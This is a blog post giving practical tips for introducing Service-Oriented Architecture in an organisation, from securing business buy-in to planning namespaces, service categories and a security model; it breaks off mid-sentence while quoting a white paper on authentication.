Hi, This is indeed an interesting case. For Commerce 9+ the unpublished node might not be in CatalogNode table and therefore referenceConverter.GetContentLink(code) do not return it. I'll file a bug to see if we should do something about this - but no promise (about it'll be fixed). Regards, /Q Hi, I have time to check this issue today and it seems that for entirely new node or entry, that code should still work (the data is saved to CatalogNode/CatalogEntry table). However if you have a published node and then create a draft version of it then it does not work - is that the scenario you mentioned? /Q Hi, Yes, I think the issue has to do with the draft version. Just did some testing on my own and this is the problem: I create a new node and save it. The node gets the code "Gratis_1". I look in the table CatalogNode where Code = 'Gratis_1' and I get a hit. So far all good. Now I change the code to "123456" but the node in CatalogNode table is not updated. I still find a row with Code = 'Gratis_1' but no node with '123456'. I then publish the node and then I find a node with the code '123456'. I tried to change the code on a already published node and the problem is the same so it has nothing to do with if the node is published or not. So I guess that the problem is that the CatalogNode code is not updated before you publish your change. Maybe it is a bit more complicated then. I mean before you publish your change on a pubilshed node the code should still be the old value, but if the node never has been published the code should update right away in the table. Do you agree, or maybe I'm missing something? Thanks for your time Quan! /Kristoffer Hi guys, Sorry for jump in but just want to confirm that I can reproduce the problem as Kristofer said in comment above now. @Kristofer: The point "if the node never has been published the code should update right away in the table." is make sense to me but maybe we need some more discussion to decise should we go head with this way or not. We will let you know then. Thanks for your detail info. /Ba Hi Magnus! So what happens is this. Our customer has an ERP from where we they import all their products. Every product has a category code which should match the code on the node in Episerver. Before they publish the node and the products underneith they want to se what it looks like on the web so they create a new node and change the code without publishing it, and then start the import job. Since the code of the Episerver node is not changed before it is published the products cannot find their nodes when being imported so nothing is being imported. The problem is that when the node is published it is pushed into the search engine and you can search for the node and also it is shown in a megemenu. Of course there is many ways to solve this by adding a property to the node "Don't show in megamenu", "Don't index" and so on and that we could easily do. Or you could publish the node and then change the "Start publish" date so this is not a big problem. I just want you to analyse the problem and decide if this is a bug or something you have to live with. Thanks Magnus, let me know if you have any more questions. /Kristoffer Thanks for the quick response and detailed explanation. While your use case is very reasonable, changing the behavior to support it isn't as simple as it might first appear. At first it seems reasonable to update code (or perhaps all properties) in the main tables whenever a draft (not-yet-published) content is saved. But it creates a number of hard to solve problems, for example what to do if there are multiple drafts for the content. Another approach is to expand the code-to-contentlink resolving to include drafts. But it leads to similar issues - should it match any draft, the latest draft, the common draft? What if multiple content have drafts matching the code? Do we need to enforce uniqueness of codes across published as well as unpublished content? So we're still debating if we can/should fix this. The import code, is that a custom implementation? If so, can't that create the node with the correct code when importing the entries? It can create the node as not published/active. Another possible workaround is to override the Code property in your node content type, and make it required: public class MyNode : NodeContent { [Required] public override string Code { get; set; } } This will make it appear in the create screen in the UI and give a chance to set the code. This initial change will be propagated to the main tables and work as you expect in the import. Thanks Magnus! A lot of good tips there and yes it is a custom implemention. I think I will go for the override-required fix. That will absolutly solve the problem with out affecting anything and that only requires a few lines of code. I see, there are a lot of problems to solve here for you and I can easily fix mine so maybe you just should let it be? :) Looking forward to hearing you descion. /Kristoffer Hi Magnus! Almost... No a big issue, but I override the Code and set the property to [Required]. When I create the node The Code field is shown, but it is not a textbox instead it is a "Change" text. I if press "Change" text textfield is show and the field is validtated as required, but if I don't press "Change" I can create a node without adding a code and the node gets a generated code. This is not a big issue for us, just explain for the editor what needs to be done but maybe this should be considered as a bug since you can create a node without entering a value? I'm not sure. Thanks again! /Kristoffer Thanks for the feedback. It can probably be considered a bug even though the interaction pattern is a bit off, simply because a property editor like this is not supposed to be used on the required field screen. I'll log the bug and we'll see. Meanwhile, as a workaround, you can add another attribute to kill the "PreviewableText" editor type and revert it to the default textbox: Just add [UIHint("")]. This is probably better UX in your case as well. Hi! I am using this line of code to get a reference to a catalog node: Works just fine it the node is published but not on a newly created node. Is there any way to get the reference to a unpublished catalog node? /Kristoffer
https://world.episerver.com/forum/developer-forum/Episerver-Commerce/Thread-Container/2016/11/get-unpublished-catalog-node-by-code/
CC-MAIN-2020-29
refinedweb
1,190
79.4
In this article by Alex Shaw, author of Android 3-0 Animations Beginners Guide, we will build on the tweening techniques we've already learned, and also apply some new techniques that were introduced in Android 3.0. In this article, we shall: - Use a ViewFlipper for animating a book-like application - Use Java to define a new tween animation and apply it to a view - Use an ObjectAnimator to apply an animation to a view, a bit like a tween - Use a ValueAnimator to generate values, which we will use for a more complex animation - Compare the Animator classes to the tween classes. Note for developers using versions of Android before 3.0 So far, everything we have learned has been backwards-compatible with previous versions of Android. This will hold true for the first part of this article, but not the second. That is to say that ViewFlippers are backwards-compatible with previous versions of Android, but ValueAnimators and ObjectAnimators are new in version 3.0. At the time of writing (mid-2011), the Android Compatibility Package does not help with this problem. Turning pages with a ViewFlipper ViewFlipper is a neat little wrapper class for applying a page-turning animation to a set of pages. It makes use of the tween animation classes, and extends them with an XML interface. The ViewFlipper is actually a subclass of something called a ViewAnimator. Do not get confused! A ViewAnimator is a completely different class to a ValueAnimator or an ObjectAnimator, and they are not interchangeable. Let's see more. Time for action – making an interactive book You have been hired by a children's book publisher to make an interactive book. The book will teach kindergarten children about different sorts of motion by showing them small animations on the pages. First up, we will use a ViewFlipper widget to make an animated page-turning interface. What better way to learn about a page-turning widget than by using it to make a book? We will also add some simple pages to test the ViewFlipper, which we can add animations to in some later examples. - Create a new Android project with the following settings: - Project name: Interactive Book - Build target: Android 3.0 - Application name: Interactive Book - Package name: com.packt.animation.interactivebook - Activity: InteractiveBook - The first thing we will do is to define a layout for our book. We want it to look a little bit like the following screenshot: - So let's begin! Open res/layout/main.xml and create the following layout: <!--?xml version="1.0" encoding="utf-8"?--> - Here we have set up the layout of the application, but we have not yet added any pages. In XML, the pages of the ViewFlipper are created by adding child layouts to ViewFlipper. - Firstly, we will want a Drawable, which we can animate. Create a new file in res/drawable called res/drawable/ball.xml and give it the following contents: <!--?xml version="1.0" encoding="utf-8"?--> - This is just an ordinary ShapeDrawable; there's no special animation and stuff here! We will just use it as a simple ball graphic while we are writing the book. Later on, we will add animation. - In main.xml, between the and tags, add the following new elements: I will intersperse the code with pictures, so that you can see what we are adding as we go along. You should add the XML in order, and use the pictures as a quick guide to get what you want? First, take a look at the following screenshot. This should give you an idea of the structure of the page that we are going to make: - Looks simple enough? Let's write the layout code for it. Remember that this is going between the and tags. - That was page 1, now let us make page 2. It will be laid out like the next screenshot: - The layout text that follows should go between the for page 1 and the tag. - Finally, this is what the last page will look like: - As you might suppose, the layout that follows goes between page 2 and the tag. - Our content pages are defined in XML. Our ViewFlipper is going to treat each of the highest-level elements (the LinearLayout and the TextView) as pages in its layout. In this sense, it works exactly as a FrameLayout would work. - Okay, great. If you ran this now, you would be able to see the first page, but we've still not connected the page-turning buttons. Let's do that now. Open up InteractiveBook.java and add the following import declarations: import android.view.View; import android.widget.Button; import android.widget.ViewAnimator; - The last one is the most important. As I mentioned earlier, the ViewFlipper is a subclass of ViewAnimator. Seeing, as we don't need to use any of the methods of the subclass, we are only going to work with its superclass. - Now, add the following block of code at the end of onCreate(). final ViewAnimator pages = (ViewAnimator) findViewById(R.id.pages); Button prev = (Button) findViewById (R.id.prev); Button next = (Button) findViewById (R.id.next); prev.setOnClickListener(new View.OnClickListener() { public void onClick (View v) { pages.showPrevious(); } }); next.setOnClickListener(new View.OnClickListener() { public void onClick(View v) { pages.showNext(); } }); - Here we can see exactly how to write a page-turning control in a ViewFlipper. Simply call pages.showPrevious() or pages.showNext(). - Build and run your application. You should see that the ViewFlipper turns pages perfectly well now. - There's something missing from this interactive book—the animation between the pages is not very smooth. In fact, all it does is switch between one page and the next. Let's give it a more natural feel with a page turning animation. In res/anim, create a new XML file called slidein.xml. This will be an ordinary tween animation. We will use this animation to introduce new pages to the screen. Add the following block of code to it: <!--?xml version="1.0" encoding="utf-8"?--> - This means that when the user turns a page, the new page comes across from the right-hand side of the screen, as if they were turning pages in a book (sort of). - Now let's add the opposite effect, by removing the old page from the screen. In res/anim, create another XML file called – you guessed it – slideout.xml. In it, add the following XML: <!--?xml version="1.0" encoding="utf-8"?--> - As the pages arrive from the right, they also move off to the left. - Now we need to add this animation to the ViewFlipper. Open up main.xml again, and add these attributes to our declaration of the ViewFlipper. - Now build and run the interactive book. You will see that your pages now transition smoothly from one to the next. What just happened? We created a book-like application that displays several pages of information. We created a new ViewFlipper widget and applied a page-turning animation to it to give it a natural, book-like feel. For convenience, the animations applied to ViewFlipper will apply to every single page that is contained within it. Remember, you do not need to apply an individual tween to each page in your book. Just adding the inAnimation and outAnimation in your ViewFlipper will be sufficient. (For more resources on Android, see here.) Have a go hero – improving the ViewFlipper Think about how you would like to turn pages in a book. Perhaps the motion that we created above could be improved in some way. Edit the slidein.xml and slideout.xml tween animations, and create a new animation of your own invention. Creating tween animations in Java So far, all of the tween animations we made have been created in XML, and there is good reason for this. Why should you want to clutter up your logical code with a load of presentation code? But sometimes you want to create your tweens programmatically, perhaps because they rely on some computed values or it makes sense to describe them computationally. Whatever the reason, we can use Java to create tween animations just as easily as we can create them in XML. Time for action – creating a tween in Java We want to make a new animation to replace slidein.xml. This time, we want our pages to come in from the right, as before, but we will add a scale animation too, to make it look more exciting. It will be as if the page is being pulled from a tall stack of pages, just out of view. But we're bored of XML. Don't ask me why, perhaps it's because of all those pointy brackets. Give us the round parentheses of Java, we say! We will use the Java equivalent of the XML tags for , , and animations. - Open up InteractiveBook.java and add the following import lines: import android.view.animation.Animation; import android.view.animation.AnimationSet; import android.view.animation.ScaleAnimation; import android.view.animation.TranslateAnimation; - All these classes describe animations like the ones we made use of in XML. - becomes AnimationSet - becomes ScaleAnimation - becomes TranslateAnimation - 2. Next, let's construct an AnimationSet, into which we can build a compound animation. Navigate to the bottom of the onCreate() method and add the following code: AnimationSet slideAndScale = new AnimationSet(true); - This creates an AnimationSet. The Boolean true means that we want a shared interpolator. It's the Java equivalent of writing the following in XML (don't add this to your code!): - Now to create a translate animation, go into the . Add the following code below our AnimationSet. TranslateAnimation slide = new TranslateAnimation( Animation.RELATIVE_TO_PARENT, 1f, Animation.RELATIVE_TO_PARENT, 0, Animation.RELATIVE_TO_SELF, 0, Animation.RELATIVE_TO_SELF, 0 ); - The Java constructor for a TranslateAnimation lets you specify the fromX, toX, fromY, and toY components of the translation. The enumeration values are the equivalent of the different value types that you can input in XML. - The options that you can specify are RELATIVE_TO_PARENT, RELATIVE_TO_SELF, and ABSOLUTE. - Now to make a scaling animation. ScaleAnimation scale = new ScaleAnimation( 10, 1, 10, 1 ); - Similar to the TranslateAnimation constructor, the arguments are fromX, toX, fromY, and toY, except that this time they are all floating-point multiplier values. - 5. Now we add them in to the main - AnimationSet as follows: slideAndScale.addAnimation(slide); slideAndScale.addAnimation(scale); - Next, we want to specify the duration of the animation. As everything has been already added to the AnimationSet, all we need to do is add the following line: slideAndScale.setDuration(1000); - As you probably expect, by now, 1000 is the duration in milliseconds to show the animation. - This concludes the construction of the AnimationSet. So all we need to do now is to set it as the inAnimation on our ViewFlipper. We've already got access to the ViewFlipper object as pages, so we can simply add this: pages.setInAnimation(slideAndScale); - There! Build and run your activity and observe the new animation. - As you can see, the image now scales as the page is turned. What just happened? We've created a new page-turning animation, which is an AnimationSet, containing a ScaleAnimation and a TranslateAnimation. Now the page looks like it is being lifted into view, as it is turned. We've created tween animations before, but this one was in Java. We have seen that it is possible to create a tween animation in Java that provides the same sort of functionality, which you would expect from a tween animation created in Java. By comparing the source against its equivalent in XML, you can see where the differences lie. Writing the SlideAndScale animation in Java In Java, we instantiate the AnimationSet, ScaleAnimation, and TranslateAnimation. The animation objects are parameterized in their respective constructors. We then add the ScaleAnimation and TranslateAnimation to the AnimationSet. AnimationSet slideAndScale = new AnimationSet(true); TranslateAnimation slide = new TranslateAnimation( Animation.RELATIVE_TO_PARENT, 1f, Animation.RELATIVE_TO_PARENT, 0, Animation.RELATIVE_TO_SELF, 0, Animation.RELATIVE_TO_SELF, 0 ); ScaleAnimation scale = new ScaleAnimation( 10, 1, 10, 1 ); slideAndScale.addAnimation(slide); slideAndScale.addAnimation(scale); slideAndScale.setDuration(1000); Writing the SlideAndScale animation In XML In XML, the tween animation is created by declaring a tag that contains the translate and scale operations as child nodes. The animations are parameterized by giving them attributes. <!--?xml version="1.0" encoding="utf-8"?--> As you can see, the advantage of the XML version is that it is more clearly laid-out. This is not just a matter of personal taste; by writing each attribute name as you assign it, there is never any ambiguity as to which value you are assigning. Look at the Java version and see if you can remember what order the constructor arguments are constructed in. It's hard, isn't it? In conclusion, programmatic tween creation should only be used when you can think of a clear advantage. (For more resources on Android, see here.) Have a go hero – tweening using Java Okay, now that we've made a tween that scales and slides in the graphic, have a go at making a similar tween for the outAnimation part of the interactive book. Look at the code you've already written, and make a new animation in Java with the following properties: - As the page leaves the screen, it moves to the left - As the page leaves the screen, it gets larger Animating with ObjectAnimator ObjectAnimators are the first animations you will learn about, which are new in Android 3.0. Recall that tweens are all about moving views from one place to another, and that they describe different kinds of motion. Unlike tweens, animators work by updating values on an object in a much more programmatic way. Animators just change numeric parameters on an object that they know nothing about, for instance, translating a view from one place to another. But by applying an animator to the X and Y coordinates of a view, an Animator can be used to perform the same task that a tween would do. Which one you choose is up to you. Animators give you more flexibility, but they might not be as clear to read. Time for action – animating the rolling ball The children's book company has got back to us and they're not happy with the first page of our interactive book. It says that the ball is rolling, but it isn't! We're going to fix this by using an ObjectAnimator to move the ball backwards and forwards across the screen. - Open up InteractiveBook.java and add a new import declaration: import android.animation.ObjectAnimator; This should come as no surprise! I already told you that we would be using the ObjectAnimator class. - Next, go to the end of the onCreate() method, and add the following lines: View rollingBall = findViewById(R.id.rollingball); ObjectAnimator ballRoller = ObjectAnimator.ofFloat( rollingBall, "TranslationX", 0, 400 ); - Underneath the code you just added, add the following. ballRoller.setDuration(2000); ballRoller.setRepeatMode(ValueAnimator.REVERSE); ballRoller.setRepeatCount(ValueAnimator.INFINITE); - These terms should look familiar to the XML we wrote in the previous chapter, although the Java form will seem unfamiliar. - setDuration sets the duration of the animation in milliseconds - setRepeatMode can be either REPEAT or REVERSE - setRepeatCount can be an integer number of repeats or (as it is here) INFINITE - One last line you need to add after all of this, is to tell Android to begin the animation immediately. ballRoller.start(); - And that's it! Couldn't be simpler. Build and run your activity and you will see that the ball on the first page now rolls backwards and forwards. - This red ball is rolling, because we animated it! What just happened? Here we used our first Animator, and it is an ObjectAnimator. The ObjectAnimator provides a simple way to animate a scene by continuously updating a parameter of that scene. In this article, we have made an interactive animation using the Android ViewFlipper class to make a page-turning interface. We also learned about the ValueAnimator and ObjectAnimator classes, which are new animation techniques in Android 3.0. Summary In this article, we learnt about the ViewFlipper class, ValueAnimator and the ObjectAnimator classes. (For more resources on Android, see here.) Android 3.0 Animations: Beginner’s Guide Bring your Android applications to life with stunning animations.
http://www.moddb.com/games/angry-birds/tutorials/animating-properties-and-tweening-pages-in-android-30
CC-MAIN-2017-47
refinedweb
2,723
57.77
sem_init - initialise an unnamed semaphore (REALTIME) #include <semaphore.h> int sem_init(sem_t *sem, int pshared, unsigned int value); The sem_init() function is used to initialise the unnamed semaphore referred to by sem. The value of the initialised semaphore is value. Following a successful call to sem_init(), the semaphore may be used in subsequent calls to sem_wait(), sem_trywait(), sem_post(), and sem_destroy().(), sem_trywait(), sem_post(), and sem_destroy() operations. Only sem itself may be used for performing synchronisation. The result of referring to copies of sem in calls to sem_wait(), sem_trywait(), sem_post(), and sem_destroy(), is undefined. If the pshared argument is zero, then the semaphore is shared between threads of the process; any thread in this process can use sem for performing sem_wait(), sem_trywait(), sem_post(), and sem_destroy() operations. The use of the semaphore by threads other than those created in the same process is undefined. Attempting to initialise an already initialised semaphore results in undefined behaviour. Upon successful completion, the function initialises the semaphore in sem. Otherwise, it returns -1 and sets errno to indicate the error. The sem_init() function will fail if: - [EINVAL] - The value argument exceeds SEM_VALUE_MAX. - [ENOSPC] - A resource required to initialise the semaphore has been exhausted, or the limit on semaphores (SEM_NSEMS_MAX) has been reached. - [ENOSYS] - The function sem_init() is not supported by this implementation. - [EPERM] - The process lacks the appropriate privileges to initialise the semaphore. None. None. None. sem_destroy(), sem_post(), sem_trywait(), sem_wait(), <semaphore.h>. Derived from the POSIX Realtime Extension (1003.1b-1993/1003.1i-1995)
http://pubs.opengroup.org/onlinepubs/007908775/xsh/sem_init.html
CC-MAIN-2013-20
refinedweb
247
57.98
If you have Azure Resources that aren’t exposed on the internet but only accessible via a private network, you can’t use Microsoft-hosted agents because they can’t connect to the private network. Therefore, we need to maintain a pool (or several pools) of self-hosted agents, with the associated costs and effort to maintain that pool(s). In this case it is where Ephemeral pipelines agents come into action. Overview Ephemeral pipelines agents come to eliminate the need to use and maintain pools of self-hosted agents for deployment purposes.This type of agents are capable to deploy to private azure resources. The process is not very complex. Ephemeral pipelines agents run in an Azure Container Instance (ACI) with access to the private network where the other Azure resources are. The agents are created to run a pipeline job and then deleted to avoid extra costs and resources consumption. This way, we can deploy to private Azure resources without having to expose them on the internet or having to maintain self-hosted agents on the same (or with access) virtual network (with their associated costs and cons). The agent that runs in the ACI its only a basic Docker image with the necessary dependencies to run the agent and to be capable to deploy to our private resources. For example, a base Ubuntu image with the necessary dependencies and the deploy agent installed. TL;DR: The purpose of this task is to create a short-lived Azure Pipelines Agent to run a deploy in a private virtual network so we can deploy to Azure Resources that are not internet accessible. ⚠️ Important: This approach (and task) is currently in preview and has known issues and limitations. Please take this into account before proceeding to use this process. How does the process works Only three steps/requirements: - One docker image that can run a deploy agent in a container (needed to provision agents). - Provision one ephemeral pipeline agent to run the deployment job. This process can be done using this task. This task provisions, configures and registers an agent on an ACI using the docker image mentioned in the first step. - The container runs one pipeline job, and then it unregisters the agent and deletes the container (it self destructs). So considering we have setup a docker image that can run a deploy agent in a container, our pipeline will look like this: As you can see, two jobs are needed: - The first one provisions the agent in one pool to run the deployment job. - The second one (depending on the first being finished correctly), runs the deployment job. It runs on the agent that the first job has provisioned. Tutorial In this post I will guide you through a simple tutorial on how to deploy assets on a container in an Azure Storage account in a private virtual network, using Ephemeral pipeline agents. So let’s get started! Requirements: - A virtual network with a security group. - A dedicated subnet in the virtual network to run the ephemeral agents. - The agent must run in the same Azure location as the virtual network. - All the created subnets must share the same security group. Overview of the resources For this tutorial I have created two resource groups: - One for the virtual network and the security group. - Another one for the Azure Container Registry (ACR) and the storage we will deploy to. Also, the Azure Storage account should be in the private network, with a configuration similar to this one: If you need it, the main repo of ephemeral agents has sample scripts on how to deploy these resources. Pushing the base image for ephemeral agents Once finished configuring our resources in Azure, we will need the base image to use with the ephemeral agents.In this case I have used the Agent Images available in the GitHub repo, specifically the Ubuntu one. We can use the pipeline in the GitHub repo to deploy our Agent image in the ACR (using an ACR Service connection). After that, we should have one repository with one image in our ACR: Setting up the pipeline in Azure DevOps After creating the needed resources and pushing the Agent Image to the ACR, we are ready to create our pipeline and use ephemeral agents to deploy. First of all, we will need to create an additional agent pool in our Project, and grant access to all pipelines. Permissions: For this process we will need to give specific permissions in order to allow the pipeline to register agents in the new pool, running jobs in these agents and unregister them. In order to register the agent a token with sufficient permissions on the Azure DevOps Organization the agent is going to be registered is needed. You can use two different types of tokens: a Personal Access Token or an OAuth token (recommended). - If using an Personal Access Token (PAT), it requires the Agent Pools Read & Manage scope and that the user who owns the PAT has administration privileges on the agent pool you intend to register the agent. - If using an OAuth token, the best approach is to use System.AccessToken which are short lived, dynamic and automatically managed by the system. If using the OAuth token, you need to met the following conditions: - The timeout for the job that creates the agent only expires after the deploy job in the agent is finished (because the token is used to register and unregister the agent in the pool). - The account Project Collection Build Service (YOUR_ORG)needs to have administration permissions on the pool (granted at the organization level, not at team project level). In this example, permissions on the pool (for the OAuth token approach) will look like the following: Additional considerations: You must register an Azure Resource provider for the namespace Microsoft.ContainerInstance in order to create container instances for the agents. This can be done easily opening a Powershell instance in the Azure portal and executing the following command: Register-AzureRmResourceProvider -ProviderNamespace 'Microsoft.ContainerInstance' This will register the needed Azure Resource provider. Service connections:. Also, as mentioned above we will need an ACR Service Connection to our ACR to run the ephemeral agents in the ACI from the Agent Image in the ACR (granting permissions to all pipelines). Pipeline definition: In this part of the process two pipelines are created for my sample project, one for creating the base image for the agents in the ACR (which we have previously created), and another one for the main deploy process of our project. The main deploy pipeline used in this tutorial is the same defined in the GitHub repo sample. As we have seen in the previous stages, we have to define two jobs: one to provision the agent and another one to perform the deploy job. Configure the variables in the sample pipeline to reference your resources correctly and then try to run it: If we have configured everything correctly, the pipeline will succeed: If we inspect our created agent pool, we will see the executed job but no agents registered in the pool (which is the main purpose of this process). This is because the agent has unregistered itself when the deployment job finished. Final result: After the deploy pipeline execution, we can check how we successfully have deployed our assets to the Azure Storage container connected to the private virtual network: Conclusion We have seen how ephemeral pipelines agents works, how to replace self-hosted agents with ephemeral ones and the most important part: how to reduce maintenance costs of having our own self-hosted agents pool(s). It is important to emphasize that this process its currently in preview, so maybe some things just do not work out of the box, but I personally think its an excellent approach to avoid having self-hosted agents in the mentioned situations. Happy deploy! 🎉🎉 Sources: Discussion
https://practicaldev-herokuapp-com.global.ssl.fastly.net/piraces/replacing-self-hosted-agents-with-ephemeral-pipelines-agents-in-azure-devops-i8h
CC-MAIN-2020-45
refinedweb
1,320
56.39
aesio – AES encryption routines¶ The AES module contains classes used to implement encryption and decryption. It aims to be low overhead in terms of memory. - class aesio. AES(key: ReadableBuffer, mode: int = 0, iv: Optional[ReadableBuffer] = None, segment_size: int = 8)¶ Encrypt and decrypt AES streams Create a new AES state with the given key. Additional arguments are supported for legacy reasons. Encrypting a string: import aesio from binascii import hexlify key = b'Sixteen byte key' inp = b'Circuit Python!!' # Note: 16-bytes long outp = bytearray(len(inp)) cipher = aesio.AES(key, aesio.mode.MODE_ECB) cipher.encrypt_into(inp, outp) hexlify(outp) encrypt_into(self, src: ReadableBuffer, dest: WriteableBuffer)¶ Encrypt the buffer from srcinto dest. For ECB mode, the buffers must be 16 bytes long. For CBC mode, the buffers must be a multiple of 16 bytes, and must be equal length. For CTX mode, there are no restrictions.
https://circuitpython.readthedocs.io/en/6.0.x/shared-bindings/aesio/index.html
CC-MAIN-2020-50
refinedweb
146
58.18
JSP Tag Pooling Memory Leaks 08/14/09 by Fabian Lange 1 Comment JSP custom tags were once widely used, but even still nowadays they find their way into projects. Not to mention the masses of production code using them. And almost all projects I have looked at using custom tags had the same issue. When writing JSP custom tags you have to remember the lifecycle model of a custom tag, because the container will typically pool tag instances. This is allowed and recommended by the specification, but can create lots of trouble when the tag is incorrectly written. Storing big objects in the tag instance will create a memory leak that can make your server go boom (or nothing happens because your tag pool is small and the instance is almost al time in use).Typically this sneaks by unnoticed in development environment. The code causing this problem looks typically like this one here:public class MyTag extends TagSupport { public Object leak; public int doStartTag(){ leak = new BigObject(); } }public class MyTag extends TagSupport { public Object leak; public int doStartTag(){ leak = new BigObject(); } }This is a problem, because the lifecycle of a pooled tag looks like this:load classcreate instanceinvoke setPageContext()invoke setterscall doStartTagcall possibly other tag methods depending on the tag type and return valuescall doEndTag()put instance in poolwhen the same tag is re-requested it may start at step 3. If in the above example this tag is pooled lets say with 10 instances and 10 simultaneous requests, 10 instances are created in the pool. But after that only a few requests come in. But still 10 instances of the tag are in the pool and contain reference to the BigObject. This is a memory leak.To avoid this always null out “transient” instance variables of the class and reload them either in setPageContext() or doStartTag(). Also note that the code inside the constructor might only be run once per tag, even when the tag is used on hundreds of pages. The amount of tag instances created (and thus also the amount of constructors invoked) depends on the container and pool settings and on the serverload.public class MyTag extends TagSupport { public Object noLeak; public void setPageContext(PageContext pc){ noLeak = new BigObject(); } public int doStartTag(){ } public void doEndTag(){ noLeak = null; } }public class MyTag extends TagSupport { public Object noLeak; public void setPageContext(PageContext pc){ noLeak = new BigObject(); } public int doStartTag(){ } public void doEndTag(){ noLeak = null; } }Other alternatives are to improve code design and make variables as local as possible. A relates problem is that you might find values in your tag that you don’t expect. Lets say a property is set when a certain parameter has a specific value. Now that condition was true, so the property holds an object that is not nulled out. The next usage of that tag will find the object even though the condition on the parameter is not set. This can really mess up your logic.
https://blog.codecentric.de/en/2009/08/jsp-tag-pooling-memory-leaks-2/
CC-MAIN-2019-18
refinedweb
495
56.59
Initialize the qtime data structure in the system page. #include "board_startup.h" void init_qtime (void) None. This function initializes the system page's qtime data structure. Initializations this function performs can include: For many x86 platforms, the generic function works. For ARM platforms, board-specific functions are often required. The following example is a init_qtime() function for the fictitious ARM DK Elsinore Ghost 8 board: #include "elsinore_startup.h" extern unsigned armv7gt_cntfrq; extern unsigned armv7gt_irq; void init_qtime_ghost8() { struct qtime_entry qtime; if (fdt_qtime(&qtime) == 0) { armv7gt_cntfrq = qtime.cycles_per_sec; armv7gt_irq = qtime.intr; } init_qtime_v7gt(); } The following example is a generic init_qtime() function x86 boards: #include "startup.h" /* By default we continue to use the 8254 timer as the system clock. However, * if the 'use_hpet_timer' flag is set we use the higher resolution HPET0 as * the system clock. * Startups have 2 choices for accomplishing that. They can set the * 'use_hpet_timer' flag in their main() and continue to call init_qtime(), or * they can call init_qtime_hpet() directly. Continuing to call init_qtime() * provides for a fallback to the 8254. startup-x86 uses the 'use_hpet_timer' * flag so that the startup specific -z option will revert to using the 8254. */ unsigned use_hpet_timer = 0; void init_qtime() { struct qtime_entry *qtime = alloc_qtime(); // ensure this is done once if (!use_hpet_timer || (init_qtime_hpet(qtime) != 0)) { init_qtime_8254(qtime); } }
http://www.qnx.com/developers/docs/7.0.0/com.qnx.doc.neutrino.building/topic/startup_lib/init_qtime.html
CC-MAIN-2018-51
refinedweb
211
50.33
Am Wed, 05 Sep 2007 13:12:24 +0000 schrieb carl.dhalluin at gmail.com: > I am completely puzzled why the following exec code does not work: > > def execute(): > exec mycode > execute() > > > I get the error: > > root at devmachine1:/opt/qbase# python error1.py > Traceback (most recent call last): > File "error1.py", line 5, in ? > execute() > File "error1.py", line 4, in execute > exec mycode > File "<string>", line 4, in ? > File "<string>", line 3, in f > NameError: global name 'math' is not defined > Note that the following code _does_ work: > > exec mycode > I have tested this in python 2.3 and 2.4. exec breaks nested namespaces here. Essentially exec "import math" puts the "math" name into the local namespace, but "def f(): math.floor" looks up "math" in the global namespace. On the module level global and local namespace are identical >>> globals() is locals() True but inside a function they are distinct >>> def f(): return globals() is locals() ... >>> f() False A workaround is to declare "math" as global: >>>>> def execute(): ... exec s ... >>> execute() 3.0 or pass it explicitly: [new interpreter session] >>>>> def execute(): ... exec s ... >>> execute() 3.0 Peter
https://mail.python.org/pipermail/python-list/2007-September/456776.html
CC-MAIN-2018-05
refinedweb
191
67.96
And now to my other project that is close to my heart at the moment which is SOA. As you may recall, we were having difficulty in selling the idea of SOA in our business, this has now changed. We have a project and a business sponsor. So in this post I want to reflect on some of the tips I’ve picked up so far that I would like to share with you. Now this is list isn’t completely comprehensive, I’m bound to have miss something out, but hey, something to talk about in future posts. Tip 1 – Don’t do anything until you have got buy-in from a business user. Like any major change you will need backing from someone with a cash-flow that gets it. Tip 2 – Define the business requirements before you start, prioritise them to find out which is the area that would most benefit. This also helps the ROI case. Tip 3 – Start small. This is a problem with my last attempt I was over ambitious and the risk was too great for management to swallow. With a new business unit that what’s to have their own new application but with the ability to integrate in to the existing systems with out affording any change to these systems we have an ideal scenario. Tip 4 – Make a plan, manage you expectations and those of the business and your management on exactly how you are going to get ‘there’ and where ‘there’ is. A good way to do this is to create a ‘maturity model’ which I have only read about on Microsoft sites, but turning to IBM they have a lovely example which is below You can read more about his diagram here at the wonderful CDBI forum. Tip 5 – Education. Give a clear and concise message about your goal that you are trying to achieve using SOA so it is easy to understand. Demonstrate if need by, getting in different vendors, we used IBM and Microsoft. They both presented about SOA and they were both very consistent with each other on style and approach, it was just the technology sell at the end that was different. Don’t forget to take the technical staff as well as management with you. It’s important to get buy-in from all levels. SOA isn’t rocket science or blue-sky, its best practice for loose-coupled integration, get that message across simply and clearly. Avoid Buzzwords … people will start playing bingo in your presentations. The most important person to educate is yourself make sure that you invest time in your learning so you can understand fully what your doing and what you will be asking others to do. No point in asking someone to write an XML Schema if you don’t know what one is and where it fits into the picture as an example. Tip 6 – Use Web Services. For the life of me I can’t see any point in trying to do SOA with any other technology, it would just be too much of a pain in the arse so it just wouldn’t be worth it. Yes, of course if your were to follow the rule book you could use any distributed technology, but the truth of the matter is that there aren’t that many distributed technologies that aren’t platform independent, ok perhaps CORBA and MQ maybe, but only web services has such broad commitment from all the big vendors and all of them are investing heavily in the technology, Microsoft is in fact betting the farm … and web services are soooo easy! The anti-web services stuff is so yesterday, get over it. Tip 7 – Work out your namespaces and schema first, but remember for all the will in the world you aren’t going to get it right first time. So in your plan have a re-engineering phase, don’t make it a surprise that you will need to go back and fix things. Don’t sell SOA as a silver-bullet, it’s a best practice and like all best practices get better each time you practice. The sweet point for this in your plan will be when you have learnt a great deal but not fully implemented a lot. Tip 8 – Categorise your services. Pretty soon you are going to have 100+ services and you will soon get spaghetti if you’re not careful Matt Deacon from Microsoft in a recent presentation recommended these different categories, Entity Services • Represent simple atomic operations on an Entity• Activity Services• Coordinate several Entity Services to enable Business Function execution (UpdateCustomer, AcceptPO)• Implement common business transactions Enterprise Services• Represent enterprise wide, or public B2B services Infrastructure Services• Provide common functionality to other services,• Represent horizontal common services across organisations• Strong buy versus build bias• Enable Security, Management and Metering/Monitoring. • Examples include Authentication, Authorization, Logging, Exception management Event Services• Notify subscribers of interesting events triggered Tip 9 – Work out your security model. This I believe will be one of the most painful things to go back and re-work, so it’s a really good idea to work this out before starting. Inside the Generico Sample SOA application found here you will find a white paper that in it will define three methodologies to choose from and they are (and I will quote directly from the document to save any confusion) 1. Use Windows integrated authentication throughout by specifying Windows as the authentication mechanism in all Web.config files and the IIS configurations of all Web applications. This means we don’t bother implementing any form-based login mechanism and instead rely on the browser providing credentials, perhaps showing a login dialog to collect them from the user if necessary. This allows us to use http as the protocol for all messages since the infrastructure will take care of performing 